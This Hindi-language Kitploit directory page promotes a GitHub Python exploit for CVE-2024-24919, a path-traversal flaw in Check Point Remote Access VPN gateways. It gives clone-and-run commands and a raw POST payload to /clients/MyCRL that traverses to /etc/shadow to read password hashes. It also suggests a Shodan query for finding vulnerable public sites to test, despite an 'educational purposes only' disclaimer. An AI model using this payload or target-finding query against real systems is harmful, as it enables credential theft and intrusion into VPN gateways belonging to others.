Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-24919-Exploit — CVE-2024-24919 एक्सप्लॉइट और PoC - रिमोट एक्सेस VPN या मोबाइल एक्सेस के लिए क्रिटिकल LFI। | Kitploit
उपकरण/GitHubGitHub/rug4lo/cve-2024-24919-exploit
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubrug4lo/cve-2024-24919-exploit

CVE-2024-24919-Exploit

CVE-2024-24919 एक्सप्लॉइट और PoC - रिमोट एक्सेस VPN या मोबाइल एक्सेस के लिए क्रिटिकल LFI।

रिपॉजिटरी देखें
322 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-24919-Exploit

अवलोकन

इस रिपॉजिटरी में CVE-2024-24919 के लिए एक पायथन एक्सप्लॉइट है, यह एक कमजोरी है जो आपको असुरक्षित पेज से संवेदनशील फ़ाइलें पढ़ने की अनुमति देती है।

यह एक्सप्लॉइट पहले जाँचता है कि लक्ष्य असुरक्षित है या नहीं, और फिर आपके द्वारा निर्दिष्ट पथ प्राप्त करता है।

गंभीरता: महत्वपूर्ण

उपयोग

पहले रिपॉजिटरी को क्लोन करें:

git clone https://github.com/Rug4lo/CVE-2024-24919-Exploit
cd CVE-2024-24919-Exploit

अनुमतियाँ दें और python3 के साथ एक्सप्लॉइट चलाएँ

chmod +x exploit.py
python3 exploit.py

फिर चरणों का पालन करें और आपको निर्दिष्ट फ़ाइल का डेटा मिल जाएगा।

यदि आपको परेशानी हो रही है, तो सुनिश्चित करें कि आपके द्वारा निर्दिष्ट URL मुख्य है।

✓ https://google.com

✘ https://google.com/search?client=firefox

POC (प्रमाण की अवधारणा)

पहले हमें यह सुनिश्चित करना होगा कि वेबसाइट में Check Point Security Gateways हैं जिनमें रिमोट एक्सेस VPN या मोबाइल एक्सेस सॉफ्टवेयर सक्षम है।

इस एक्सप्लॉइट में हम {ip}/clients/MyCRL एंडपॉइंट की ओर इशारा कर रहे हैं।

यह एंडपॉइंट असुरक्षित है यदि हम एक POST अनुरोध करते हैं, हम स्ट्रिंग CSHELL/ और उस फ़ाइल का पथ जोड़ते हैं जिसे हम पथ ट्रैवर्सल का उपयोग करके पढ़ना चाहते हैं।

अनुरोध कुछ इस प्रकार होगा:

POST /clients/MyCRL HTTP/1.1
Host: <redacted>
Content-Length: 39

aCSHELL/../../../../../../../etc/shadow

हम यह सब स्रोत कोड को देखकर प्राप्त करते हैं।

प्रक्रिया के बारे में अधिक जानकारी के लिए यह पोस्ट देखें --> https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/

परीक्षण

यदि आप इस कमजोरी का परीक्षण करना चाहते हैं, तो आप Sodan का उपयोग करके कुछ असुरक्षित वेबसाइटें ढूंढ सकते हैं, sodan में इस क्वेरी का उपयोग करें:

Server: “Check Point SVN Foundation”

संदर्भ

https://nvd.nist.gov/vuln/detail/CVE-2024-24919 https://www.cronup.com/cve-2024-24919-zeroday-critico-explotado-activamente-en-vpns-check-point/ https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2024-24919

अस्वीकरण

यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों के लिए है। इसका जिम्मेदारी से उपयोग करें और केवल उन सिस्टमों पर जिन तक आपके पास पहुँच की अनुमति है।

टूल डाउनलोड करें